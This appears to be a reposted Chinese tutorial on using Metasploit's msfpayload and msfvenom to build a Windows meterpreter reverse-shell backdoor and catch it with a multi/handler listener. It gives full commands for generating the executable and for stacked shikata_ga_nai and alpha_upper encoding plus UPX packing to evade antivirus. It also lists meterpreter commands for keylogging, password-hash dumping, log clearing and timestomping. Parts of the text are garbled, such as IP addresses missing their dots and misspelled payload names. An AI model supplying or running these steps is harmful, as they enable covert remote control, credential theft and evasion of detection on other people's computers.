设定目标主机为:cn_win7_x86_7601虚拟机,地址为:1921680116;而本地主机就为:1921680149。
方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。
sfpayload windows/meterpreter/reverse_tcp LHOST=1921680149 x >steupexe
方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。
方法步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。
Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop 截取目标主机当前桌面会话窗口
run webcam -p /var/>Metasploit Framework命令汇总 、msfconsole 帮助菜单 back 前环境返 banner 显示MSF banner cd 切换目录 color 颜色转换 connect 连接主机 exit 退MSF help 帮助菜单 info 显示或模块信息 irb 进入irb脚本模式 jobs 显示管理作业 kill 杀死作业 load 加载插件 loadpath 路径搜索并加载模块 quit 退MSF resource 运行存储文件命令 route 查看路由信息 save 保存作 search 搜索模块名描述 set 给变量赋值 setg 值赋给全局变量 show 显示所给类型模块或所模块 sleep 限定秒数内做 unload 卸载模块 unset 解除或变量 unsetg 解除或全局变量 use 通名称选择模块 version 显示MSF控制台库版本号 二、database db_add_host 添加或主机数据库 db_add_note 添加注释主机 db_add_port 添加端口主机 db_connect 连接存数据库 db_create 创建新数据库实例 db_del_host 数据库删除或主机 db_del_port 数据库删除端口 db_destroy 删除存数据库 db_disconnect 断与前数据库实例连接 db_driver 指定数据库驱 db_hosts 列数据库所主机 db_nmap 执行Nmap并记录输 db_notes 列数据库所注释 db_services 列数据库所服务 db_vulns 列数据库所漏洞 db_workspace 转换数据库工作区 db_import_ip_list 引入IP列表文件 db_import_amap_mlog 引入THC-Amap扫描结文件(-o -m) db_import_nessus_nbe 引入Nessus扫描结文件(NBE) db_import_nessus_xml 引入Nessus扫描结文件 db_import_nmap_xml 引入Nmap扫描结文件(-oX) db_autopwn 自利用 三、db_autopwn -h 显示帮助 -t 显示所匹配利用模块 -x 选择基于漏洞模块 -p 选择基于放端口模块 -e 运行所匹配目标利用程序 -r 用反向连接shell(reverse) -b 用随机端口绑定shell(bind) -q 禁用利用程序输 -l [范围] 范围内主机进行利用 -X [范围] 永远排除范围内主机 -PI [范围] 放些端口主机进行利用 -PX [范围] 永远排除放些端口主机 -m [范围] 运行名字与则表达式匹配模块 四、Meterpreter 核命令: 帮助菜单 channel 显示态频道信息 close 关闭频道 exit 终止meterpreter help 帮助菜单 interact 频道交互 irb IRB脚本模式 migrate 转移meterpreter其进程 quit 终止meterpreter read 频道读数据 run 执行meterpreter脚本 use 加载或扩展 write 向频道写数据 文件系统命令: cat 读取文件内容屏幕 cd 切换目录 del 删除指定文件 download 载文件或目录 edit 编辑文件 getlwd 获取本工作目录 getwd 切换工作目录 lcd 切换本工作目录 lpwd 打印本工作目录 ls 文件列表 mkdir 创建目录 pwd 打印前工作目录 rm 删除指定文件 rmdir 远程目录 upload 传文件或目录 中国络命令: ipconfig 显示中国络接口 portfwd 发送本端口远程服务 route 查看修改路由表 系统命令: clearev 清除事件志 execute 执行命令 getpid 取前进程ID getuid 取服务器运行用户 kill 杀死进程 ps 列进程列表 reboot 重启远程计算机 reg 修改远程注册表 rev二self 远程机器调用RevertToSelf() shell 返cmdshell shutdown 关闭远程系统 sysinfo 取远程系统信息 用户接口命令: enumdesktops 列所访问桌面windows工作站 idletime 远程用户闲置间 keyscan_dump 转存击键缓存 keyscan_start 始捕捉击键 keyscan_stop 停止捕捉击键 setdesktop 转移另工作站桌面 uictl 用户接口控制 密码数据库命令: hashdump SAM转储 间戳命令: timestomp 修改文件间一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是1921681113,端口设置成443所以最后连接会通向1921681113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1921681113 LPORT=443 -f exe > abcexe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=1921681113 X > Desktop/abcexe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192168128129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acnexe
upx加壳:upx -5 /root/Desktop/acnexe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abcexe放到win7下执行
5,在命令行下,打开msfconsole
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来
8,验证
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)